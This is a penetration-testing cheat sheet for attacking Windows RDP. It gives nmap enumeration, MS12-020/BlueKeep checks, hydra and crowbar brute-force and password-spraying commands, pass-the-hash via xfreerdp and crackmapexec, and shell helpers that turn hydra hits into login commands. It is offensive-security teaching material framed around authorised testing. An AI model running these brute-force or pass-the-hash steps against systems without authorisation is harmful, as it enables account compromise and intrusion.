RDP (3389)
Check if accessible
RDP enum scripts — version, encryption, NLA
nmap --script rdp-* -p 3389 $IP
(rdp-* expands to rdp-enum-encryption, rdp-ntlm-info and rdp-vuln-ms12-020)
Example Output
nmap --script rdp-* -p 3389 10.10.10.5
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     SSL: SUCCESS
|_  RDP Protocol Version: RDP 10.x
| rdp-ntlm-info:
|   Target_Name: TARGET
|   NetBIOS_Computer_Name: TARGET
|   DNS_Computer_Name: target.corp.local
|_  Product_Version: 10.0.17763
(NLA state comes from rdp-enum-encryption, not rdp-ntlm-info. rdp-ntlm-info reports the build, not the OS name: 10.0.17763 is Windows Server 2019 / Windows 10 1809. A host with NLA enabled still has to be brute forced through CredSSP, so valid credentials are needed before any interactive logon screen appears)
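When the scan covers a whole range, the per-host NSE output is long and the two facts you want (build number, NLA or not) are buried in it. The script below is an added example, not part of the original cheat sheet: it reads nmap normal output (-oN) from stdin and prints one line per host with the IP, DNS name, Product_Version and whether rdp-enum-encryption saw CredSSP (NLA) succeed. The sample scan text is constructed for this example and follows the layout of the two NSE scripts; hostnames, IPs and the 10.10.10.9 legacy host are made up.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): condense nmap's
# rdp-enum-encryption / rdp-ntlm-info output for a range into one line per
# host: ip, DNS name, Product_Version, NLA or no-NLA.
# Real usage:  nmap --script rdp-* -p 3389 -oN rdp.txt 10.10.10.0/24
#              rdp_summary < rdp.txt

# Constructed sample of nmap -oN output for two hosts (made up for this
# example; it mirrors the layout of the two NSE scripts).
SAMPLE_NMAP='Nmap scan report for 10.10.10.5
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     SSL: SUCCESS
|_  RDP Protocol Version: RDP 10.x
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Computer_Name: TARGET
|   DNS_Computer_Name: target.corp.local
|_  Product_Version: 10.0.17763

Nmap scan report for legacy01.corp.local (10.10.10.9)
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     Native RDP: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|_  RDP Protocol Version: RDP 5.x
| rdp-ntlm-info:
|   Target_Name: LEGACY01
|   NetBIOS_Computer_Name: LEGACY01
|   DNS_Computer_Name: legacy01.corp.local
|_  Product_Version: 6.1.7601
'

# rdp_summary: read nmap -oN text on stdin, print "ip dns_name version nla-state"
# for every host that produced a Product_Version line. NLA counts as present
# only when rdp-enum-encryption printed "CredSSP (NLA): SUCCESS".
rdp_summary() {
    awk '
        function emit() {
            if (ip != "" && ver != "")
                printf "%s %s %s %s\n", ip, (dns != "" ? dns : "-"), ver, (nla != "" ? nla : "no-NLA")
            ip = ""; dns = ""; ver = ""; nla = ""
        }
        /^Nmap scan report for/ {
            emit()
            # last field is either "1.2.3.4" or "(1.2.3.4)" when nmap resolved a name
            ip = $NF; sub(/^\(/, "", ip); sub(/\)$/, "", ip)
            next
        }
        /CredSSP \(NLA\): SUCCESS/ { nla = "NLA" }
        /DNS_Computer_Name:/       { dns = $NF }
        /Product_Version:/         { ver = $NF }
        END { emit() }
    '
}

printf '%s' "$SAMPLE_NMAP" | rdp_summary
```

Hosts that come out as no-NLA with a 6.x build are the ones worth running the MS12-020/BlueKeep checks against; hosts with NLA need credentials before anything else on this page applies.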
BlueKeep / MS12-020 check
CVE-2019-0708 (BlueKeep) — pre-auth RCE if unpatched
nmap --script rdp-vuln-ms12-020 -p 3389 $IP
(this NSE script tests MS12-020, CVE-2012-0002 / CVE-2012-0152, not BlueKeep. For CVE-2019-0708 use the Metasploit scanner auxiliary/scanner/rdp/cve_2019_0708_bluekeep; both only fire on old unpatched builds)
Example Output
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
(The scanners are safe to run. Exploiting BlueKeep is not: a failed attempt BSODs the target, so only exploit with explicit client sign-off)
Brute force
With known usernames — weak passwords
hydra -l <user> -P passwords.txt rdp://$IP
Example Output
hydra -l administrator -P passwords.txt rdp://10.10.10.5
[3389][rdp] host: 10.10.10.5   login: administrator   password: Winter2025!
OR: crowbar -b rdp -s 10.10.10.5/32 -u admin -C passwords.txt
(crowbar drives a real RDP client, so it copes with NLA targets more reliably than hydra; hydra's rdp module needs few parallel connections, -t 1 or -t 4 with -W 1 between attempts, or the server drops logins and hides valid hits. Check the domain lockout policy first: a handful of wrong passwords per account will lock domain users out, so spray one password across many users rather than a wordlist against one user)
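Hits rarely stay in one terminal; you usually paste them into xfreerdp later, and passwords like Winter2025! or anything containing $ or a quote break a naive /p:$pw. The script below is an added example, not part of the original cheat sheet or of hydra: it reads hydra output on stdin and prints one shell-safe xfreerdp command per hit line. The hydra output it parses is constructed for this example (the hosts, users and passwords are made up); the line shape matches hydra's "[port][rdp] host: ... login: ... password: ..." format shown above.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): turn hydra's RDP hit
# lines into ready-to-paste xfreerdp commands with shell-safe quoting.

# Constructed sample hydra output; hosts, users and passwords are made up.
SAMPLE_HYDRA="[DATA] attacking rdp://10.10.10.5:3389/
[3389][rdp] host: 10.10.10.5   login: administrator   password: Winter2025!
[3389][rdp] host: 10.10.10.5   login: svc_backup   password: it's\$ecret
[3389][rdp] host: 10.10.10.6   login: administrator   password: Winter2025!
1 of 1 target successfully completed, 3 valid passwords found"

# shell_quote: wrap a value in single quotes, escaping embedded single quotes
# as '\'' so the result survives a copy-paste into any POSIX shell.
shell_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# hydra_to_xfreerdp: read hydra output on stdin, print one xfreerdp command
# per "[port][rdp] host: H   login: U   password: P" line. Everything after
# "password: " is the password, so passwords containing spaces survive too.
hydra_to_xfreerdp() {
    while IFS= read -r line; do
        case $line in
            '['*'][rdp] host: '*) ;;
            *) continue ;;
        esac
        host=${line#*host: };     host=${host%% *}
        user=${line#*login: };    user=${user%% *}
        pass=${line#*password: }
        # /cert:ignore skips the certificate prompt, /dynamic-resolution fits the desktop to your window
        printf 'xfreerdp /v:%s /u:%s /p:%s /cert:ignore /dynamic-resolution\n' \
            "$host" "$(shell_quote "$user")" "$(shell_quote "$pass")"
    done
}

printf '%s\n' "$SAMPLE_HYDRA" | hydra_to_xfreerdp
```

For domain accounts add /d:<domain> to the printed command; hydra reports only the bare login it was given.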
Connect with found creds
xfreerdp (or rdesktop) — full GUI access
xfreerdp /u:<user> /p:<pass> /v:$IP
(add /cert:ignore to skip the certificate prompt, /d:<domain> for domain accounts and /dynamic-resolution to fit the desktop to your window; rdesktop cannot do NLA, so prefer xfreerdp)
Example Output
xfreerdp /u:admin /p:Password123 /v:10.10.10.5
[INFO] Connected to 10.10.10.5:3389
(Full GUI desktop access)
Pass the hash
If you have the NTLM hash — no password needed
xfreerdp /u:<user> /pth:<hash> /v:$IP
(only works when the target has Restricted Admin mode enabled, HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0; otherwise the logon fails even with a valid hash. Verify the hash over SMB first, and with local admin from SMB you can set that value yourself before connecting)
Example Output
crackmapexec smb 10.10.10.20 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
SMB 10.10.10.20 445 WEB01 [+] CORP\administrator:... (Pwn3d!)
(Pwn3d! = local admin with just the hash, confirmed over SMB before trying RDP. The NT hash in this example is the well-known hash of an empty password, a placeholder only)